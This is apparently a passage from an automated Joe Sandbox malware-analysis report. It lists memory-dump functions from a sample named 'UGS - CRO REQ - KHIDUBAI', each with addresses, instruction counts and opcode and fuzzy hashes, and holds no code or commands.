Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b730e566daa88f1b17be5d19090b297bce09dc9aa4d2d9077ab5f0e4d22a84
Instruction ID: 607c13d7cb027933a5bb6799d815c752b4c6f6b73b891e8ced6c6504914d4063
Opcode Fuzzy Hash: 98b730e566daa88f1b17be5d19090b297bce09dc9aa4d2d9077ab5f0e4d22a84
Instruction Fuzzy Hash: 1D11A279A41219CFCB14CF68D884AA9F7B5FB48301F1581E6E819A7356C731ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04EE5C5C Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c45b37f266f60daa4325ee7d6e557620eb4ab587769969d0f7694cf7a6d8968
Instruction ID: 6db2cdabdfed284bd09124fcf67df595441c22460f7776f30d4241b1bc84fe6a
Opcode Fuzzy Hash: 4c45b37f266f60daa4325ee7d6e557620eb4ab587769969d0f7694cf7a6d8968
Instruction Fuzzy Hash: F711FA34A042248FCB64EF65D8447EEB7B1EF89314F1484E9D809A7395DB34AE85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00614F50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81941f830d397bcc06daa88aceb2607bc0d5987aa6d10f435558fb9248de74c0
Instruction ID: 558a7923aa96e473b768e5b4dfdadfe8883641a85141fb5240fb92d9d67fbcb9
Opcode Fuzzy Hash: 81941f830d397bcc06daa88aceb2607bc0d5987aa6d10f435558fb9248de74c0
Instruction Fuzzy Hash: 84012835E006199FCB00DFA9D5049DEBBF5EF89711F108569E519A3320EB30AA49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0060EF78 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b19cdb883980304d4a2e24d1429128e597db8d40c45581a4f1a9a7f65d6cc2af
Instruction ID: 21b32f9bd3ffd079be0580bf04069ba1ae15b1989dfde267f008a97506bcd7df
Opcode Fuzzy Hash: b19cdb883980304d4a2e24d1429128e597db8d40c45581a4f1a9a7f65d6cc2af
Instruction Fuzzy Hash: D20131353016209FC3199B65D814A2EB7E2EBCD711B10852AE90A877E4CF31ED42CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0060E317 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1347322145bceeabae8d38b7f06dacbca82c7ca0252b883ea5360b941d28558d
Instruction ID: a7110a2da30a4c2b3ca2f882e91525a1367571d1c16d7d0a67be6ddd948138a1
Opcode Fuzzy Hash: 1347322145bceeabae8d38b7f06dacbca82c7ca0252b883ea5360b941d28558d
Instruction Fuzzy Hash: E1F028313402845FC716DB18E8849AE7FA2AFC4310B044429ED098B762D671DC89C750

Uniqueness

Uniqueness Score: -1.00%

Function 00601950 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a7483b990e6c882c62d131749c408f7bf72b4fe3b6808467b61d60a90af59a
Instruction ID: 1cba19ae311b3ff710a65826a5291d9caa3af0e085440b1c4e8a964529ff02bf
Opcode Fuzzy Hash: 34a7483b990e6c882c62d131749c408f7bf72b4fe3b6808467b61d60a90af59a
Instruction Fuzzy Hash: 8FF02462B8D2904FE32A03382C20326BFA29F83310F1840ABD5858F3E2C956DC038390

Uniqueness

Uniqueness Score: -1.00%

Function 006018F8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06347c8854e0924b988d4b4c44f17b4f7a197794cd09d81bf8012be61171213c
Instruction ID: 997abb637c14b7fe829ace963c3242475f76830700fe12b8d85944c23ed2458a
Opcode Fuzzy Hash: 06347c8854e0924b988d4b4c44f17b4f7a197794cd09d81bf8012be61171213c
Instruction Fuzzy Hash: 50F0E931B443115FE3288619981476BF7AAEBC9720F144069E9099F3D0CE71EC4287C4

Uniqueness

Uniqueness Score: -1.00%

Function 007D5B5F Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b37cd8c9b4d8c1f74c84e9ca00bda145305f9c1b4a2866eb67cdf041243eb32d
Instruction ID: 8ea062aab3e84a776b55004110ffb79adf641b55b440f700f2c12431b5b20f1f
Opcode Fuzzy Hash: b37cd8c9b4d8c1f74c84e9ca00bda145305f9c1b4a2866eb67cdf041243eb32d
Instruction Fuzzy Hash: C8112974905619CFC764CF24C944A99BBB1FF49301F1085EBE40AAB3A1D735AD84DF10

Uniqueness

Uniqueness Score: -1.00%

Function 0060F452 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67e97483438ba82d543cf220e2dafb91316be31bfe12b2b20f1f88063d41bd75
Instruction ID: c7e617f72e1d8a6ce6f2cf16f57a143da9235507edd9c9ca47375576f4311825
Opcode Fuzzy Hash: 67e97483438ba82d543cf220e2dafb91316be31bfe12b2b20f1f88063d41bd75
Instruction Fuzzy Hash: 5BF0E2213987901BC72E136498202BF2BDB4BC1760F1484BFE845C76D3CA698C0683D5

Uniqueness

Uniqueness Score: -1.00%

Function 04EE5C4E Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc23b17befc3b0752720e09ba6cfdfe8e64a827fbd7c609e5ef0482fadfb1c64
Instruction ID: c2646d2c16bbcf3ff8b224a40f66fadee1b2ec9f48998778bda9c344957cd085
Opcode Fuzzy Hash: cc23b17befc3b0752720e09ba6cfdfe8e64a827fbd7c609e5ef0482fadfb1c64
Instruction Fuzzy Hash: 1701DC35E00225DFCB61EF56D8046F9B7B0AF59318F0584E9D849A3390EB786E86DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00619757 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebd20cf7dadd716148ba3eaaeda0660597c0859490033e6f8ba019c8a023600
Instruction ID: c95b2db4167752ea5df676c4ab260f4f2082bebc819e5202e91f5b4a54016968
Opcode Fuzzy Hash: 9ebd20cf7dadd716148ba3eaaeda0660597c0859490033e6f8ba019c8a023600
Instruction Fuzzy Hash: 49F0A93160A2008BE714DEA5D4157E972B3AB42711F2CC575D4018B2D9C339EDC6CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0060BA5F Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62c53d373da09da41777f9f4ae577c38bee99e07f33fc858ad21acbcba2b5b4d
Instruction ID: acf86ba9e520a02daaa94dd8ab25282630b076b6b937f17ea6debd2bb7f96701
Opcode Fuzzy Hash: 62c53d373da09da41777f9f4ae577c38bee99e07f33fc858ad21acbcba2b5b4d
Instruction Fuzzy Hash: 74F082322057866BC3129B29E898A8BBFA69ED22203548C77D449CB177C978D94E8790

Uniqueness

Uniqueness Score: -1.00%

Function 0060ECFA Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2acf2d6cf24aed5b31c82c8ba1b5d4272a786b0b86c08ac5702c8b4b6873815b
Instruction ID: bc8fe5ed04f70b0c9b91272660104938ed5efd590dfb3197388d09f9c6e83f39
Opcode Fuzzy Hash: 2acf2d6cf24aed5b31c82c8ba1b5d4272a786b0b86c08ac5702c8b4b6873815b
Instruction Fuzzy Hash: 03F01D393406009FC3199B58D858E3A77A6FFC9721B1445AEF946CB7A0CA31DC42DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00605F60 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87bec91a540a5c85347b731a97b38a0b0ddb17b4b508b6e5dbf4aa0b459cae93
Instruction ID: afd0010fe9fc7901bdc8a5057cfc9b64e7135f7507879cc2353a349cf1e8e07f
Opcode Fuzzy Hash: 87bec91a540a5c85347b731a97b38a0b0ddb17b4b508b6e5dbf4aa0b459cae93
Instruction Fuzzy Hash: D0F0F6319482498FCB18DB94CD149DFBBF2AF89310F20846ED002B7291CBB90D458FA1

Uniqueness

Uniqueness Score: -1.00%

Function 04EE12BF Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e051343cf2de749a8f03822e57776e94517e371a26345611f5000a73901df64
Instruction ID: 65ad5ae4c51f760cb71eef7d2130136fdda37e073565389617538c4550cae132
Opcode Fuzzy Hash: 4e051343cf2de749a8f03822e57776e94517e371a26345611f5000a73901df64
Instruction Fuzzy Hash: 0C019774E483288FCB55EF54D949ADAB7B1EF89300F0080E9D40DA7395DA386E84DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0060ED00 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 683f30089e90e437d218877d552a7648035a9b2db36ada553bd56fec78df2ff9
Instruction ID: 584e1d564dfc1512590a81b0506ce9eee0b22c5b859dc528444142e13b5f512a
Opcode Fuzzy Hash: 683f30089e90e437d218877d552a7648035a9b2db36ada553bd56fec78df2ff9
Instruction Fuzzy Hash: 4EF05E393402009FC318DB19D898E2A77AAFFC8721F10446AF9068B3B0CA31EC42DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04EF6528 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e0eb8d6b62b837bc84e051d715ee4d1c4b252b9274ba0682b4146ca762ca3e4
Instruction ID: e99bfb05a31aa15126a2f8cd4dc7e49eff23f794bffa1450dd8bdda0e3da20c5
Opcode Fuzzy Hash: 6e0eb8d6b62b837bc84e051d715ee4d1c4b252b9274ba0682b4146ca762ca3e4
Instruction Fuzzy Hash: 78E01A6130032427D31C266A6C62B6FA98EDBC5760F69852EB509CB39ACCA29D0243E5

Uniqueness

Uniqueness Score: -1.00%

Function 04EE3130 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19df94f024089bf0f175602b39744dc9615f5107787c27ba820de9acfebc0e06
Instruction ID: 2835ac0ff754ba549a627644ae473a0bcffe8faec4d4efb23c4ac9257d292552
Opcode Fuzzy Hash: 19df94f024089bf0f175602b39744dc9615f5107787c27ba820de9acfebc0e06
Instruction Fuzzy Hash: D001EC34A062188FDB54EF58D995AEEB7F1EF89300F1050E6A409A7395CB346F80CF91

Uniqueness

Uniqueness Score: -1.00%

Function 006196E9 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a507f031f3f17fdee5869241e4bf2673551a4bbd4b65254a849da81d99aa616
Instruction ID: 12020aa0b5ea9cf3865e9a24b5e90efb98ee7f5f26b02ac98ab4aa5a5533e120
Opcode Fuzzy Hash: 9a507f031f3f17fdee5869241e4bf2673551a4bbd4b65254a849da81d99aa616
Instruction Fuzzy Hash: 73F03731604204CBE704DF84E469BE9B3B3BB46700F28C0A4E6011F299C375AE869BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0061D800 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f151ffffe90d7d9502f9431a058ab83e34325dabc674f5ace0f2ccda7c212865
Instruction ID: b5118cf12877506cafd17175ef83310f7611256580a49806d7c7563a9c44d42f
Opcode Fuzzy Hash: f151ffffe90d7d9502f9431a058ab83e34325dabc674f5ace0f2ccda7c212865
Instruction Fuzzy Hash: D8E012326152149FC754DAA8A4406DA77FED748665B18406BD509C3640EA32984187A0

Uniqueness

Uniqueness Score: -1.00%

Function 0061E9B0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bae06f1f05c88a772bac2cc059fafdf749baf26a725544d3ba4570e7cca063d
Instruction ID: 24438e54dcb30dbaa2b022496dfd804ea9e6b917a4df60512b601158fdda6a35
Opcode Fuzzy Hash: 0bae06f1f05c88a772bac2cc059fafdf749baf26a725544d3ba4570e7cca063d
Instruction Fuzzy Hash: B7F027B190E284EFC709CB609C114FE7B769B5230072844EFD447C7252E6364B46A711

Uniqueness

Uniqueness Score: -1.00%

Function 0061DE36 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0d7355795906b5c629e324d43b2df7318415ba265ce2f495207863d0c2c0418
Instruction ID: 28aba76c284982f35be6768ed718bc7688545bfc7bba88703780c68cd52b0527
Opcode Fuzzy Hash: e0d7355795906b5c629e324d43b2df7318415ba265ce2f495207863d0c2c0418
Instruction Fuzzy Hash: DAF0E572F001168FCB206B68E8483EA37639B683A1B2D8D37C8058B395DD209CC69B91

Uniqueness

Uniqueness Score: -1.00%

Function 007D5AEF Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8027ee66edcec15d7b5a11abd312872053b39c6a64d003d5a036571857d4c2
Instruction ID: c25c76fba3a5794b7918be0f89af57357042566c4a28ada89add9ae944cbf896
Opcode Fuzzy Hash: ac8027ee66edcec15d7b5a11abd312872053b39c6a64d003d5a036571857d4c2
Instruction Fuzzy Hash: 49F03774945618CFC720CF24C898998BBB1FF09306F2184DAD41AEB361DB75AD85CF01

Uniqueness

Uniqueness Score: -1.00%

Function 0061617D Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d38c62cce24b4007b18aacd6a3975d94f641c4248514e9abdcb9b2e5a9328a
Instruction ID: f90551622a766401a70b425d831404f4ba34e5194078840ac23c76c3d4605f30
Opcode Fuzzy Hash: 59d38c62cce24b4007b18aacd6a3975d94f641c4248514e9abdcb9b2e5a9328a
Instruction Fuzzy Hash: D5E0A0716083806FC302DB2CE8D1684AFA66F86210B1985A6C004CB656CE64DD0887A0

Uniqueness

Uniqueness Score: -1.00%

Function 00617B41 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fc416f86ec5394f2569d691687a7d715a26ee6a5a3fd530732f8a2862f2f0b
Instruction ID: 21992ca51de4ccd2f1b28c22ad54a16a84e70450ea1f43ce2887b79a18d65dac
Opcode Fuzzy Hash: c1fc416f86ec5394f2569d691687a7d715a26ee6a5a3fd530732f8a2862f2f0b
Instruction Fuzzy Hash: F5F06537148148AFCB02CF94EC41CE67F71EF4A210708809BFD158B221C672D866EF91

Uniqueness

Uniqueness Score: -1.00%

Function 0060D0D9 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07fd66a9540bc92cd5fc34be65fe2669c5ce34bebea3a07540fd18c6629a728
Instruction ID: 328a03fe98f30e2ff4c636c62310342a50dd4e65e9779f92afded479f2605ab2
Opcode Fuzzy Hash: a07fd66a9540bc92cd5fc34be65fe2669c5ce34bebea3a07540fd18c6629a728
Instruction Fuzzy Hash: 44E022B220E3C14FC323873CAD2006A3FE18B9620038846DBC0C4CB2D7E958CC0B8712

Uniqueness

Uniqueness Score: -1.00%

Function 0061961D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45098f965b836c9f0c9aa25d40af418adf9636ff7d6432aa11e29af199c5b4e3
Instruction ID: afd30b187a53720b0ed17d6c267bf2032f6594a1d96cc12cb91ce5f064ded2a5
Opcode Fuzzy Hash: 45098f965b836c9f0c9aa25d40af418adf9636ff7d6432aa11e29af199c5b4e3
Instruction Fuzzy Hash: 7EF05E306042008BDB10DF84D865BEA73B3AB46700F18C465D6051F385C734AC868BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0061BB80 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00d67172db1a7ac183d9de1f38760ae5a26e0b69c3f16e65027b32d99449a3c1
Instruction ID: 0afff4a7f284322edae81a5e2a259aa29e01b09c446cca7d8aca2ba9b2b707f0
Opcode Fuzzy Hash: 00d67172db1a7ac183d9de1f38760ae5a26e0b69c3f16e65027b32d99449a3c1
Instruction Fuzzy Hash: C9E0123154D1C44FC357C7A4E8A18A87FB19E9711432885EFD449CF7A3CA23980BCB51

Uniqueness

Uniqueness Score: -1.00%

Function 006034D8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69c8ffe593bc1e1b878125fdf687235b478bf6be40095f09f78f26c0f229ab7
Instruction ID: 6bb9e9426b6a70f4e9b99774652cd59f0c321fe84bc3f2a539ec1d7303e46e92
Opcode Fuzzy Hash: c69c8ffe593bc1e1b878125fdf687235b478bf6be40095f09f78f26c0f229ab7
Instruction Fuzzy Hash: 65E0DF313850505FC7288A5DAC54CFB7BA98ED6B2231840AFF406CB761CA718C43DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00619451 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2beba1b246ccdd4e5c93c21589cf0ef28cf253cadf6eee1ecffdb560fdfef803
Instruction ID: acfe57c0a9fbfd63b348b5e1f9981041396d280553ad3d517cac49a17f880c97
Opcode Fuzzy Hash: 2beba1b246ccdd4e5c93c21589cf0ef28cf253cadf6eee1ecffdb560fdfef803
Instruction Fuzzy Hash: C6F0FE34A042048FCB44EF95E4556EE77B3EF8A710F289166D4029B399C7349D86DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0060BA70 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5957f5cce48e3255d46b05d0f54a2b33edba5487e2a1b5cda4bd24f6a43c90f
Instruction ID: 0e08844c29e2e8e97bba847e779014e40964473e36d4a2fcb3de9bca4a944250
Opcode Fuzzy Hash: b5957f5cce48e3255d46b05d0f54a2b33edba5487e2a1b5cda4bd24f6a43c90f
Instruction Fuzzy Hash: DDE012723003596BC7119B1AE889E4BFB9ADFD03243908D3AD54A87125DA74E90E8794

Uniqueness

Uniqueness Score: -1.00%

Function 007D7F3A Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7543103d4050f424b88b4db4668d8ef9916262c89bc977b8550e5341f9988c7
Instruction ID: 0950dec00b8c4f8e054d656ff63f5d42cff535f9c6eb7e7f1f071d8600f799b2
Opcode Fuzzy Hash: c7543103d4050f424b88b4db4668d8ef9916262c89bc977b8550e5341f9988c7
Instruction Fuzzy Hash: D6F0A475A01118CFDB64DF28D854AA8B7B1FB49311F1081D7D849A7321CB31AD45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0061A471 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ce9c8e2e9e0416b27239f9c767a088140042d5e9c99271a5db02b9ca42d4e73
Instruction ID: 220c98e73a2cc4c590766567ba55cd9065ce221992cb5bb892849e45065e2eb6
Opcode Fuzzy Hash: 9ce9c8e2e9e0416b27239f9c767a088140042d5e9c99271a5db02b9ca42d4e73
Instruction Fuzzy Hash: A0E04F361091986FDB02CF94EC91DA97F75EF8A220718808BFC558B262C6729D25DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00618EC0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ad5091832ed340f14a6832f9c5fb31005abb07b0e6fa7f0ed9135e301a2b42
Instruction ID: 52175683322837a4e55ce70dd6eb10d6674d6aba93be04665cb4e3c7210fec34
Opcode Fuzzy Hash: 62ad5091832ed340f14a6832f9c5fb31005abb07b0e6fa7f0ed9135e301a2b42
Instruction Fuzzy Hash: 09E01A35200A00DFC320CA1AD954F53F3EAEFC9B20F59956EE54A87B20DA71F841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0061E2C8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

